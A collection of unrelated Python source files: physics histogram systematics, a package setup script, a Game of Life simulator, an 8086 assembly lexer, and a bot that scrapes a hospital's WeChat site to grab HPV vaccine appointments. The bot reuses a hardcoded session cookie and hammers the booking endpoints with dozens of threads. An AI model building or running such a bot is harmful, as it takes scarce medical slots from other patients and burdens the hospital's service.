varied_hists = self.get_varied_hist(initial_varied_hists=None, data=data, weights=weights, binning=binning)
covariance_matrix = self.get_cov_from_varied_hists(varied_hists=varied_hists)
assert len(covariance_matrix.shape) == 2, covariance_matrix.shape
assert covariance_matrix.shape[0] == covariance_matrix.shape[1] == binning.num_bins_total, \
(covariance_matrix.shape, binning.num_bins_total)
return covariance_matrix
def get_varied_hist(
self,
initial_varied_hists: Optional[Tuple[np.ndarray, ...]],
data: Optional[np.ndarray] = None,
weights: WeightsInputType = None,
binning: Optional[Binning] = None
) -> Tuple[np.ndarray, np.ndarray]:
assert data is not None
assert weights is not None
assert binning is not None
assert len(self._sys_weight) == len(data), (len(self._sys_weight), len(data))
if initial_varied_hists is None:
initial_varied_hists = (np.zeros(binning.num_bins_total), np.zeros(binning.num_bins_total))
assert len(initial_varied_hists) == 2, len(initial_varied_hists)
wc = weights > 0.
weights_up = copy.copy(weights)
weights_up[wc] = weights[wc] / self._sys_weight[wc] * (self._sys_weight[wc] + self._sys_uncert[wc])
weights_dw = copy.copy(weights)
weights_dw[wc] = weights[wc] / self._sys_weight[wc] * (self._sys_weight[wc] - self._sys_uncert[wc])
bins = [np.array(list(edges)) for edges in binning.bin_edges]
hist_up, _ = np.histogramdd(data, bins=bins, weights=weights_up)
hist_dw, _ = np.histogramdd(data, bins=bins, weights=weights_dw)
assert hist_up.shape == hist_dw.shape, (hist_up.shape, hist_dw.shape)
if binning.dimensions > 1:
flat_hist_up = hist_up.flatten()
flat_hist_dw = hist_dw.flatten()
assert flat_hist_up.shape == flat_hist_dw.shape, (flat_hist_up.shape, flat_hist_dw.shape)
assert flat_hist_up.shape[0] == binning.num_bins_total, (flat_hist_up.shape, binning.num_bins_total)
return initial_varied_hists[0] + flat_hist_up, initial_varied_hists[1] + flat_hist_dw
else:
return initial_varied_hists[0] + hist_up, initial_varied_hists[1] + hist_dw
@staticmethod
def get_cov_from_varied_hists(varied_hists: Tuple[np.ndarray, np.ndarray]) -> np.ndarray:
assert len(varied_hists) == 2, len(varied_hists)
hist_up, hist_dw = varied_hists
assert hist_up.shape == hist_dw.shape, (hist_up.shape, hist_dw.shape)
diff_sym = (hist_up - hist_dw) / 2.
return np.outer(diff_sym, diff_sym)
class SystematicsInfoItemFromVariation(SystematicsInfoItem):
def __init__(self, sys_weight: np.ndarray, sys_uncert: np.ndarray):
super().__init__()
assert isinstance(sys_uncert, np.ndarray), type(sys_uncert)
assert len(sys_uncert.shape) == 2, sys_uncert.shape
assert sys_uncert.shape[1] > 1, sys_uncert.shape
assert len(sys_weight) == len(sys_uncert), (sys_weight.shape, sys_uncert.shape)
self._sys_type = "variation"
self._sys_weight = sys_weight
self._sys_uncert = sys_uncert
def number_of_variations(self) -> int:
return self._sys_uncert.shape[1]
def get_covariance_matrix(
self,
data: Optional[np.ndarray] = None,
weights: WeightsInputType = None,
binning: Optional[Binning] = None
) -> np.ndarray:
varied_hists = self.get_varied_hist(initial_varied_hists=None, data=data, weights=weights, binning=binning)
return self.get_cov_from_varied_hists(varied_hists=varied_hists)
def get_varied_hist(
self,
initial_varied_hists: Optional[Tuple[np.ndarray, ...]],
data: Optional[np.ndarray] = None,
weights: WeightsInputType = None,
binning: Optional[Binning] = None
) -> Tuple[np.ndarray, ...]:
assert data is not None
assert weights is not None
assert binning is not None
assert len(self._sys_weight) == len(data), (len(self._sys_weight), len(data))
if initial_varied_hists is None:
initial_varied_hists = tuple([np.zeros(binning.num_bins_total) for _ in range(self.number_of_variations())])
assert len(initial_varied_hists) == self.number_of_variations(), \
(len(initial_varied_hists), self.number_of_variations())
varied_hists = []
for hist_variation, sys_weight_var in zip(initial_varied_hists, self._sys_uncert.T):
varied_weights = copy.copy(weights)
w_cond = weights > 0.
varied_weights[w_cond] = weights[w_cond] / self._sys_weight[w_cond] * sys_weight_var[w_cond]
bins = [np.array(list(edges)) for edges in binning.bin_edges]
varied_hists.append(hist_variation + np.histogramdd(data, bins=bins, weights=varied_weights)[0].flatten())
assert len(varied_hists) == len(initial_varied_hists), (len(varied_hists), len(initial_varied_hists))
assert all(len(vh.shape) == 1 for vh in varied_hists), [vh.shape for vh in varied_hists]
assert all(vh.shape[0] == binning.num_bins_total for vh in varied_hists), \
([vh.shape for vh in varied_hists], binning.num_bins_total)
return tuple(varied_hists)
@staticmethod
def get_cov_from_varied_hists(varied_hists: Tuple[np.ndarray, ...]) -> np.ndarray:
cov = np.cov(np.column_stack(varied_hists))
assert cov.shape[0] == cov.shape[1] == len(varied_hists[0]), (cov.shape[0], cov.shape[1], len(varied_hists[0]))
assert not np.isnan(cov).any()
return cov
class SystematicsInfo(Sequence):
def __init__(
self,
in_sys: SystematicsInputType = None,
data: Optional[np.ndarray] = None,
in_data: Optional[np.ndarray] = None,
weights: WeightsInputType = None
):
self._sys_info_list = self._get_sys_info(in_systematics=in_sys, data=data, in_data=in_data, weights=weights)
super().__init__()
def _get_sys_info(
self,
in_systematics: SystematicsInputType,
data: np.ndarray,
in_data: Optional[pd.DataFrame],
weights: WeightsInputType
) -> List[Union[None, SystematicsInfoItem]]:
if in_systematics is None:
return []
# If not None, systematics must be provided as Tuple for one or List of Tuples for multiple.
if isinstance(in_systematics, np.ndarray):
return [self._get_sys_info_from_cov_matrix(in_systematics)]
elif isinstance(in_systematics, tuple):
return [self._get_single_sys_info(in_systematics, data, in_data, weights)]
elif isinstance(in_systematics, list):
return self._get_sys_info_from_list(in_systematics, data, in_data, weights)
else:
raise ValueError(f"Provided systematics has unexpected type {type(in_systematics)}.")
@staticmethod
def _get_sys_info_from_cov_matrix(in_systematics: SystematicsInputType) -> SystematicsInfoItem:
assert isinstance(in_systematics, np.ndarray), type(in_systematics)
assert len(in_systematics.shape) == 2, len(in_systematics.shape)
assert in_systematics.shape[0] == in_systematics.shape[1], (in_systematics.shape[0], in_systematics.shape[1])
return SystematicsInfoItemFromCov(cov_matrix=in_systematics)
def _get_single_sys_info(
self,
in_systematics: SystematicsInputType,
data: np.ndarray,
in_data: Optional[pd.DataFrame],
weights: WeightsInputType
) -> Union[None, SystematicsInfoItem]:
if in_systematics is None:
return None
if len(in_systematics) == 1:
return self._get_sys_info_from_cov_matrix(in_systematics)
elif len(in_systematics) == 2:
sys_weight = Weights.obtain_weights(weight_input=in_systematics[0], data=data, data_input=in_data)
assert len(sys_weight) == len(data), (len(sys_weight), len(data))
assert len(sys_weight) == len(weights)
assert not np.isnan(sys_weight).any()
assert np.all(sys_weight[weights > 0.] > 0.)
if isinstance(in_systematics[1], list):
variations = [Weights.obtain_weights(s, data, in_data) for s in in_systematics[1]]
sys_uncert = np.column_stack((variation for variation in variations))
assert sys_uncert.shape[1] == len(in_systematics[1]), (sys_uncert.shape, len(in_systematics[1]))
assert not np.isnan(sys_uncert).any()
return SystematicsInfoItemFromVariation(sys_weight=sys_weight, sys_uncert=sys_uncert)
else:
sys_uncert = Weights.obtain_weights(weight_input=in_systematics[1], data=data, data_input=in_data)
assert not np.isnan(sys_uncert).any()
return SystematicsInfoItemFromUpDown(sys_weight=sys_weight, sys_uncert=sys_uncert)
else:
raise ValueError(f"Systematics must be provided as tuple or list of tuples"
f"or directly as the respective covariance matrix. "
f"Each tuple must contain 2 entries!\n"
f"A provided tuple was of size {len(in_systematics)} != 2.")
def _get_sys_info_from_list(
self,
in_systematics: SystematicsInputType,
data: np.ndarray,
in_data: Optional[pd.DataFrame],
weights: WeightsInputType
) -> List[Union[None, SystematicsInfoItem]]:
if len(in_systematics) == 0:
return []
result = [self._get_single_sys_info(in_sys, data, in_data, weights) for in_sys in in_systematics]
return [e for e in result if e is not None]
@property
def as_list(self) -> List[Union[None, SystematicsInfoItem]]:
return self._sys_info_list
def __getitem__(self, i) -> Optional[SystematicsInfoItem]:
return self._sys_info_list[i]
def __len__(self) -> int:
return len(self._sys_info_list)
| eckerpatrick/TemplateFitter | templatefitter/binned_distributions/systematics.py | systematics.py | py | 14,197 | python | en | code | null | github-code | 90 |
27620099382 | from setuptools import setup, find_packages
from codecs import open
import os
import re
package_name = 'mySQLace'
here = os.path.abspath(os.path.dirname(__file__))
# Get the long description from the README file
os.system("pandoc -f markdown -t rst README.md -o README.rst")
with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
# Get the version number from the __init__.py file in the package
with open(os.path.join(here, package_name, '__init__.py'), encoding='utf-8') as v:
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", v.read(), re.M)
if version_match:
current_version = version_match.group(1)
else:
raise RuntimeError("Unable to find version string.")
setup(
name=package_name,
version=current_version,
description="Python interface for MySQL connections",
long_description=long_description,
url='https://github.com/jordanncg/mySQLace',
author='Jordan Yerandi Cortes Guzman',
author_email='jordancg91@gmail.com',
license='GPL',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
],
keywords='development mysql connector',
packages=find_packages(exclude=["contrib", "docs", "tests*"]),
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'mySQLace=mySQLace:main',
],
},
)
| jordancortes/mySQLace | setup.py | setup.py | py | 1,866 | python | en | code | 0 | github-code | 90 |
11504406141 | import LifeGame as lg
import LifeGameUI as lgui
import numpy as np
TOLERANCE = 0.1
NUMBER_ITER_INIT = 1000
class LifeGameSim:
def __init__ (self, life_cols = lgui.LIFE_COLS, life_rows = lgui.LIFE_ROWS, max_gen = lg.MAX_GENERATION, tolerance = TOLERANCE):
self.life_cols = life_cols
self.life_rows = life_rows
self.max_gen = max_gen
self.tolerance = tolerance
def run(self, niter_init = NUMBER_ITER_INIT):
running = True
ni = niter_init
while running:
print ("Runnig sample 1 for ni = ", ni)
dres1 = self.runSample(ni)
print ("Runnig sample 2 for ni = ", ni)
dres2 = self.runSample(ni)
diff_mean_oldest = abs(dres1['mean_oldest'] - dres2['mean_oldest'])
diff_std_oldest = abs(dres1['stdev_oldest'] - dres2['stdev_oldest'])
if (diff_mean_oldest < dres1['mean_oldest'] * self.tolerance and diff_mean_oldest < dres2['mean_oldest'] * self.tolerance
and diff_std_oldest < dres1['stdev_oldest'] * self.tolerance and diff_std_oldest < dres2['stdev_oldest'] * self.tolerance):
running = False
else:
ni *= 2
dres1['n_iter'] = ni
return dres1
def runSample(self, ni):
aoldest = np.zeros(ni)
#aaveage = []
#amaxgen = []
for i in range(ni):
#print ("Iteration: ", i)
print (".", end='', flush=True)
lgame = lg.LifeGame(life_cols = self.life_cols, life_rows = self.life_rows, max_gen = self.max_gen, no_gui = True, silent = True)
dresults = lgame.run()
aoldest[i] = dresults['oldest']
#aaveage.append(dresults['ave_age'])
#amaxgen.append(dresults['max_gen'])
print("!", flush = True)
#npaoldest = np.array(aoldest)
dres = {}
dres['mean_oldest'] = np.nanmean(aoldest)
dres['stdev_oldest'] = np.nanstd(aoldest, ddof = 0)
print ("Average oldest: ", dres['mean_oldest'])
print ("Standard deviation: ", dres['stdev_oldest'])
#print (npaoldest)
#print (aaveage)
#print (amaxgen)
return dres
| chintonp/LifeGame | LifeGame/LifeGameSim.py | LifeGameSim.py | py | 2,215 | python | en | code | 0 | github-code | 90 |
21674879188 | import os
import ply.lex as lex
symbolTable = {}
registers = {
'AX': 'AX',
'BX': 'BX',
'CX': 'CX',
'DX': 'DX',
'AH': 'AH',
'AL': 'AL',
'BH': 'BH',
'BL': 'BL',
'CH': 'CH',
'CL': 'CL',
'DH': 'DH',
'DL': 'DL',
'DI': 'DI',
'SI': 'SI',
'BP': 'BP',
'SP': 'SP',
'DS': 'DS',
'ES': 'ES',
'SS': 'SS',
'CS': 'CS'
}
reserved = {
'MOV': 'MOV',
'ADD': 'ADD',
'SEGMENT': 'SEGMENT_START',
'INT': 'INT',
'ENDS': 'SEGMENT_ENDS',
'END': 'END_LABEL',
'DB': 'DB',
'LOOPNE': 'LOOPNE',
'LOOP': 'LOOP',
'LEA': 'LEA',
'SHL': 'SHL',
'CMP': 'CMP',
'SHR': 'SHR',
'INC': 'INC',
'DUP': 'DUP',
'RET': 'RET'
} | registers
tokens = [
'SUB',
'SEPARATOR',
'DECIMALNUMBER',
'BINARYNUMBER',
'OCTALNUMBER',
'HEXNUMBER',
'ID',
'PLUS',
'MINUS',
'COLON',
'ASSUME',
'LBRACKET',
'RBRACKET',
'AND',
'DQUOTE',
'SQUOTE',
'STRING',
'LPAREN',
'RPAREN'
] + list(reserved.values())
t_DQUOTE = r'"'
t_SQUOTE = r'\''
t_SEPARATOR = r','
t_ignore = ' \t'
t_PLUS = r'\+'
t_MINUS = r'-'
t_COLON = r':'
t_LBRACKET = r'\['
t_RBRACKET = r'\]'
t_LPAREN = r'\('
t_RPAREN = r'\)'
t_HEXNUMBER = r'(0[xXhH][ABCDEFabcdef0-9]+)|([ABCDEFabcdef0-9]+[hH])'
t_DECIMALNUMBER = r'(0[dD]\d+)|(\d+[dD]?)'
t_OCTALNUMBER = r'(0[qQoO][0-7]+)|([0-7]+[qQoO])'
t_BINARYNUMBER = r'([01]+[bByY])|(0[bByY][01]+)'
def t_RET(t):
r'(?i)RET'
return t
def t_DUP(t):
r'(?i)DUP'
return
def t_STRING(t):
r'(".+")|(\'.+\')'
return t
def t_ADD(t):
r'(?i)ADD'
return t
def t_SUB(t):
r'(?i)SUB'
return t
def t_SHL(t):
r'(?i)SHL'
return t
def t_CMP(t):
r'(?i)CMP'
return t
def t_INC(t):
r'(?i)INC'
return t
def t_LEA(t):
r'(?i)LEA'
return t
def t_INT(t):
r'(?i)INT'
return t
def t_MOV(t):
r'(?i)MOV'
return t
def t_LOOPNE(t):
r'(?i)LOOPNE'
return t
def t_LOOP(t):
r'(?i)LOOP'
return t
def t_ASSUME(t):
r'(?i)ASSUME'
return t
def t_ignore_TITLE(t):
r'(?i)TITLE.*'
def t_COMMENT(t):
r';.*'
def t_ID(t):
r'[a-zA-Z_][a-zA-Z_0-9]*'
t.type = reserved.get(t.value, 'ID') # Check for reserved words
return t
def t_error(t):
print("Illegal character '%s'" % t.value[0])
t.lexer.skip(1)
def t_newline(t):
r'\n+'
t.lexer.lineno += len(t.value)
fileName = input("Enter filepath:")
with open(fileName, 'r') as f:
data = f.read()
lexer = lex.lex()
lexer.input(data)
while True:
tok = lexer.token()
if not tok:
break # No more input
print(tok)
| giannhs694/Assembly8086Compiler | Assembly8086Lexer.py | Assembly8086Lexer.py | py | 3,042 | python | en | code | 0 | github-code | 90 |
2345962124 | import os
import re
import time
import urllib
from datetime import datetime
from urllib import request, parse
from lxml import html
from urllib.parse import quote
import _thread
from multiprocessing import Process
import smtplib
import urllib
from email.header import Header
from datetime import datetime
from email.mime.text import MIMEText
# 公共请求头需要自行抓包重新填写Cookie
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 '
'Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63030532)',
'Host': 'sych.xiaoerfang.cn',
"Cookie": "_csrf=9133752109ef502c887da9c6ced273f981a89aeee34932eb33f7156eed9389fda%3A2%3A%7Bi%3A0%3Bs%3A5%3A"
"%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22MsQiC1t36K_kE5oRksbquHFUmZapKS00%22%3B%7D; "
"PHPSESSID=fesorlm206odi5qbg6nhuki0sm; "
"_identity=7d042ddbddc61566b1a8bfc98321906b4af3d0a8da2737e9ce55cfa90c0b9cf4a%3A2%3A%7Bi%3A0%3Bs%3A9%3A"
"%22_identity%22%3Bi%3A1%3Bs%3A53%3A%22%5B%22433796%22%2C%22sBETxTqvITVgM7jcZJCL9_BBjfK76_eh%22"
"%2C2592000%5D%22%3B%7D",
}
# 九价疫苗余量日期查询URL
dataurl = "https://sych.xiaoerfang.cn/sychwx/index.php?r=source%2Flist&specCode=442&specName=%E7%96%AB%E8%8B%97%E6%8E%A5%E7%A7%8D%E9%97%A8%E8%AF%8A&deptType=0&oneDeptId=285&twoDeptId=442&visitDate="
# 构造POST请求的默认接口
posturl = "https://sych.xiaoerfang.cn/sychwx/index.php?r=source%2Finfo"
# 九价疫苗默认CSRF获取URL
csrfurl = "https://sych.xiaoerfang.cn/sychwx/index.php?r=source%2Findex&deptId=442&twoDeptName=%E7%96%AB%E8%8B%97%E6" \
"%8E%A5%E7%A7%8D%E9%97%A8%E8%AF%8A&deptType=0&oneDeptId=285&oneDeptName=%E5%A6%87%E5%A5%B3%E5%81%A5%E5%BA" \
"%B7%E4%BF%9D%E5%81%A5%E4%B8%AD%E5%BF%83"
# 九价疫苗预约日期对应的specCode
global_specCode = []
# 九价疫苗预约日期对应的specName
global_specName = []
# 九价疫苗预约日期对应的regToken
# 0:上午 1:下午 2:晚上
global_regToken = []
# 九价疫苗预约日期对应的medFee
global_medFee = []
# 九价疫苗预约日期对应的csrf
csrf = ""
# 日期格式1
data1 = "2021-11-24"
# 日期格式2
data2 = "20211124"
# 时间格式1
time1 = "09:30"
# 时间格式2
time2 = "10:00"
# 选择上午(0)或者下午(1)
ap = 0
# 收件提醒邮箱
inbox = "xxxxxx@163.com"
# 日志记录
def wrLog(str2):
dt = datetime.now()
str1 = dt.strftime('%Y-%m-%d %H:%M:%S %f')
str1 = str1 + " " + str2 + "\n"
with open('log.txt', 'a') as f:
f.writelines(str1)
# 获取csrf_token为预定做准备
def getcsrf():
global csrf, csrfurl
data = ""
try:
if os.path.exists("csrf.html"):
print("File csrf.html already exist!")
with open('csrf.html', 'r') as f:
data = f.read()
searchObj = re.search(r'var _csrf = "(.*)"', data, re.M | re.I)
csrf = searchObj.group(1)
wrLog("成功获取csrf_token")
print("成功获取csrf_token")
print(csrf)
return
else:
req = request.Request(url=csrfurl, headers=headers, method='GET')
response = request.urlopen(req)
data = response.read().decode('utf-8')
searchObj = re.search(r'var _csrf = "(.*)"', data, re.M | re.I)
csrf = searchObj.group(1)
if csrf != "":
with open('csrf.html', 'w') as f:
f.writelines(data)
wrLog("成功获取csrf_token")
print("成功获取csrf_token")
print(csrf)
return
except:
wrLog("获取失败csrf_token")
print("获取失败csrf_token")
def regTokenHTML(specname="宫颈癌九价疫苗门诊", url=dataurl):
try:
getcsrf()
except:
return
try:
url = url + data1
req = request.Request(url=url, headers=headers, method='GET')
response = request.urlopen(req)
data = response.read().decode('utf-8')
selector = html.etree.HTML(data)
# 解析获得specCode和specName
xpathstr = "//div[@specname=\"" + specname + "\"]/@"
specCode = selector.xpath(xpathstr + "speccode")
if specCode != []:
with open('regToken.html', 'w') as f:
f.writelines(data)
else:
return
except:
return
# 获取展开内容的URL提取时间等参数
def expand(specname="宫颈癌九价疫苗门诊", url=dataurl):
global global_regToken, global_medFee, global_specCode, global_specName, data1, data2
data = ""
try:
try:
if os.path.exists("csrf.html"):
print("File csrf.html already exist!")
with open('csrf.html', 'r') as f:
data = f.read()
searchObj = re.search(r'var _csrf = "(.*)"', data, re.M | re.I)
csrf = searchObj.group(1)
wrLog("成功获取csrf_token")
print("成功获取csrf_token")
print(csrf)
else:
return 0
except:
return 0
# 若已经获得regToken.html直接读取本地文件掠过一步
if os.path.exists("regToken.html"):
print("File regToken.html already exist!")
with open('regToken.html', 'r') as f:
data = f.read()
else:
return 0
selector = html.etree.HTML(data)
# 解析获得specCode和specName
xpathstr = "//div[@specname=\"" + specname + "\"]/@"
specCode = selector.xpath(xpathstr + "speccode")
if specCode != []:
specName = selector.xpath(xpathstr + "specname")
index = 0
for i in specName:
specName[index] = quote(i, 'utf-8')
index = index + 1
medFee = selector.xpath(xpathstr + "medfee")
regToken = selector.xpath(xpathstr + "regtoken")
visitTimeName = selector.xpath(xpathstr + "visittimename")
# 全局变量赋值
global_regToken = regToken
global_medFee = medFee
global_specCode = specCode
global_specName = specName
# specCode = 1236
# medFee = 50
print("specCode", specCode)
print("specName", specName)
print("medFee", medFee)
print("regToken", regToken)
print("visitTimeName", visitTimeName)
wrLog("成功获取regToken")
print("成功获取regToken")
return 1
else:
wrLog("获取regToken失败")
print("获取regToken失败")
return 0
except:
wrLog("获取regToken失败")
print("获取regToken失败")
return 0
# 获取预约的POST信息反馈
def postpack(posturl=posturl):
global global_regToken, global_medFee, csrf, global_specCode, data2, time1, time2
global ap
try:
# 需要两次request
getcsrf()
data = ""
if csrf == "":
return data
# 这里的speccode与时间有关,标明时间
# deptId填的是大部门名号
# deptName就诊科室
# specName就诊专家
# 1236 442
d = {'deptId': '442',
'deptName': '疫苗接种门诊',
'specName': '宫颈癌九价疫苗门诊',
'specCode': global_specCode[ap],
'medFee': global_medFee[ap],
'visitDate': data2,
'regToken': global_regToken[ap],
'startTime': time1,
'endTime': time2,
'doctorCode': '',
'doctorName': '',
'doctorFlag': '',
'_csrf': csrf
}
data = bytes(urllib.parse.urlencode(d), encoding='utf8')
# 需要三次request
req = request.Request(url=posturl, headers=headers, data=data)
response = request.urlopen(req)
date = response.read().decode('utf-8')
if date == "":
return 0
else:
with open('post.html', 'w') as f:
f.writelines(date)
return date
except:
return 0
def FuckYou(date):
global csrf, global_regToken, global_specCode, data2, time1, time2
global ap
try:
#
url = "https://sych.xiaoerfang.cn/sychwx/index.php?"
r = "pool/reg2"
_csrf = csrf
searchObj = re.search(r'PutRegForm\[ptId\]\\" value=\\"(.*?)\\">', date, re.M | re.I)
PutRegForm_ptId = searchObj.group(1)
PutRegForm_visitingDate = data2
PutRegForm_doctorName = ""
PutRegForm_deptId = "442"
# 指明是九价苗
PutRegForm_deptName = "%E7%96%AB%E8%8B%97%E6%8E%A5%E7%A7%8D%E9%97%A8%E8%AF%8A"
PutRegForm_specCode = global_specCode[ap]
PutRegForm_specName = ""
searchObj = re.search(r'PutRegForm\[orderChannel\]\\" value=\\"(.*?)\\">', date, re.M | re.I)
PutRegForm_orderChannel = searchObj.group(1)
PutRegForm_regToken = global_regToken[ap]
PutRegForm_doctorCode = ""
PutRegForm_startTime = time1
PutRegForm_endTime = time2
PutRegForm_doctorFlag = ""
PutRegForm_doctorName = ""
PutRegForm_doctorCode = ""
url = url + "r=" + r
url = url + "&_csrf=" + _csrf
url = url + "&PutRegForm[ptId]=" + PutRegForm_ptId
url = url + "&PutRegForm[visitingDate]=" + PutRegForm_visitingDate
url = url + "&PutRegForm[doctorName]=" + quote(PutRegForm_doctorName, 'utf-8')
url = url + "&PutRegForm[deptId]=" + PutRegForm_deptId
url = url + "&PutRegForm[deptName]=" + PutRegForm_deptName
url = url + "&PutRegForm[specCode]=" + PutRegForm_specCode
url = url + "&PutRegForm[specName]=" + PutRegForm_specName
url = url + "&PutRegForm[orderChannel]=" + PutRegForm_orderChannel
url = url + "&PutRegForm[regToken]=" + PutRegForm_regToken
url = url + "&PutRegForm[doctorCode]=" + PutRegForm_doctorCode
url = url + "&PutRegForm[startTime]=" + PutRegForm_startTime
url = url + "&PutRegForm[endTime]=" + PutRegForm_endTime
url = url + "&PutRegForm[doctorFlag]=" + "&PutRegForm[doctorName]=" + "&PutRegForm[doctorCode]="
# 需要四次request
req = request.Request(url=url, headers=headers, method='GET')
response = request.urlopen(req)
data = response.read().decode('utf-8')
print(data)
if data == "":
with open('fuck.html', 'w') as f:
f.writelines(data)
return 0
else:
with open('fuck.html', 'w') as f:
f.writelines(data)
return data
except:
return 0
def multiT():
res = ""
while True:
dt = datetime.now()
str1 = dt.strftime('%Y-%m-%d %H:%M:%S %f')
res = expand(specname="宫颈癌九价疫苗门诊", url=dataurl)
if res != 0:
str1 = str1 + " " + "获取展开连接成功"
print(str1)
wrLog("获取展开连接成功")
print(res)
break
else:
str1 = str1 + " " + "获取展开连接失败"
print(str1)
wrLog("获取展开连接成功")
continue
while True:
dt = datetime.now()
str1 = dt.strftime('%Y-%m-%d %H:%M:%S %f')
res = postpack(posturl)
if res != 0:
str1 = str1 + " " + "POST成功"
print(str1)
wrLog("POST成功")
print(res)
break
else:
str1 = str1 + " " + "POST失败"
print(str1)
wrLog("POST失败")
continue
while True:
dt = datetime.now()
str1 = dt.strftime('%Y-%m-%d %H:%M:%S %f')
res = FuckYou(res)
if res != 0:
str1 = str1 + " " + "FUCK成功"
print(str1)
wrLog("FUCK成功")
print(res)
break
else:
str1 = str1 + " " + "FUCK失败"
print(str1)
wrLog("FUCK失败")
continue
def multiP(t1, t2, app):
# 初始化时间参数
global time1, time2, ap
time1 = t1
time2 = t2
ap = app
print("time1: ", time1, "time2: ", time2, "ap: ", ap)
try:
# 创建四个线程
_thread.start_new_thread(multiT, ())
_thread.start_new_thread(multiT, ())
_thread.start_new_thread(multiT, ())
_thread.start_new_thread(multiT, ())
except:
print("Error: 无法启动线程")
while 1:
pass
def regTokenHTMLP():
while True:
regTokenHTML(specname="宫颈癌九价疫苗门诊", url=dataurl)
def init():
global headers
data = ""
if os.path.exists("cookie"):
print("File cookie already exist!")
with open('cookie', 'r') as f:
data = f.read()
headers['Cookie'] = data
print(headers)
# 生成当天日期后七天的格式化日期
def getDay():
ToDay = time.strftime("%Y-%m-%d", time.localtime())
arg1 = ToDay[:8]
arg2 = ToDay[8:10]
index = 0
list = []
while index < 8:
num = int(arg2)
num = num + index
num = str(num).zfill(2)
arg = arg1 + num
list.append(arg)
# print(arg)
index = index + 1
return list
# 邮件发送提醒服务
def mail(inbox, data):
dt = datetime.now()
str1 = dt.strftime('%Y-%m-%d %H:%M:%S %f')
# 发信方的信息:发信邮箱,QQ 邮箱授权码
from_addr = 'xxxxx@qq.com'
password = 'xxxxxxx'
# 收信方邮箱
to_addr = inbox
# 发信服务器
smtp_server = 'smtp.qq.com'
# 邮箱正文内容,第一个参数为内容,第二个参数为格式(plain 为纯文本),第三个参数为编码
msg = MIMEText(str1 + " send by HPV-Hijack ", 'plain', 'utf-8')
# 邮件头信息
msg['From'] = Header('HPV-Hijack')
msg['To'] = Header(to_addr)
msg['Subject'] = Header(data)
try:
# 开启发信服务,这里使用的是加密传输
server = smtplib.SMTP_SSL(smtp_server)
server.connect(smtp_server, 465)
# 登录发信邮箱
server.login(from_addr, password)
# 发送邮件
server.sendmail(from_addr, to_addr, msg.as_string())
# 关闭服务器
server.quit()
str1 = "邮件发送成功 发送地址邮箱地址为: " + to_addr
wrLog(str1)
except smtplib.SMTPException:
str1 = "Error: 无法发送邮件 " + to_addr
wrLog(str1)
# 检查票务状态
def checkNumber(url=dataurl, headers=headers):
list = getDay()
for i in list:
dayurl = url + i
try:
req = request.Request(url=dayurl, headers=headers, method='GET')
# req = proxiesrequest(dayurl, headers, 'GET')
wrLog("抓取URL:" + dayurl + "成功")
except:
wrLog("抓取URL:" + dayurl + "失败")
continue
response = request.urlopen(req)
# time.sleep(0.1)
data = response.read().decode('utf-8')
selector = html.etree.HTML(data)
# 抓取时间分布
title = selector.xpath(
'//*[@id="collapse3"]/div[@class="weui-media-box__bd item-detail"]/div[@class="weui-cell"]/div['
'@class="weui-cell__bd"]/table[@class="cell__bd_td"]/tr/td/p/text()')
dt = datetime.now()
str1 = dt.strftime('%Y-%m-%d %H:%M:%S %f')
time.sleep(0.1)
if title == []:
print(str1 + i + "当天无号")
wrLog(i + "当天无号")
continue
# print(title)
# 抓取号码状态
state = selector.xpath(
'//*[@id="collapse3"]/div[@class="weui-media-box__bd item-detail"]/div[@class="weui-cell"]/div['
'@class="weui-cell__bd"]/table[@class="cell__bd_td"]/tr/td/p/span/text()')
# print(state)
index = 0
for j in title:
title[index] = j[:2]
index = index + 1
# print(title)
index = 0
for k in state:
str = i + " " + title[index] + " " + state[index]
#print(title[index])
#print(state[index])
if state[index] != "约满" and state[index] != "无号":
print(str1 + "当天有号")
print(str)
mail(inbox, str)
return i
else:
print(str1 + i + "当天无号")
index = index + 1
return 0
def main1():
init()
# 创建获取regToken
p1 = Process(target=regTokenHTMLP, args=(), kwargs={})
# 创建上午约号进程
t1 = "09:30"
t2 = "10:00"
app = 0
am930 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
t1 = "10:00"
t2 = "10:30"
am10 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
t1 = "10:30"
t2 = "11:00"
am1030 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
t1 = "11:00"
t2 = "11:30"
am110 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
t1 = "11:30"
t2 = "12:00"
am1130 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
# 创建下午约号进程
t1 = "13:00"
t2 = "13:30"
app = 1
pm130 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
t1 = "13:30"
t2 = "14:00"
pm1330 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
t1 = "14:00"
t2 = "14:30"
pm140 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
p1.start() # 开启第一个进程
#time.sleep(0.5)
am930.start() # 开启第二个进程
#time.sleep(0.5)
am10.start()
#time.sleep(0.5)
am1030.start()
#time.sleep(0.5)
am110.start()
#time.sleep(0.5)
am1130.start()
#time.sleep(0.5)
pm130.start()
#time.sleep(0.5)
pm1330.start()
#time.sleep(0.5)
pm140.start()
def main2():
global data1, data2
while True:
time.sleep(1)
try:
res = checkNumber(url=dataurl, headers=headers)
if res != 0:
data1 = res
tmp = ""
for i in range(0, len(res)):
if i != 4 and i != 7:
tmp = tmp + res[i]
data2 = tmp
break
except:
continue
return
if __name__ == '__main__':
main2()
main1()
| June-xiaowu/Beijing-HPV | SYFYBJY/JL.py | JL.py | py | 18,672 | python | en | code | 3 | github-code | 90 |
5544490482 | # 미네랄
# 복습 횟수:2, 02:00:00, 복습필요3
import sys
from collections import deque
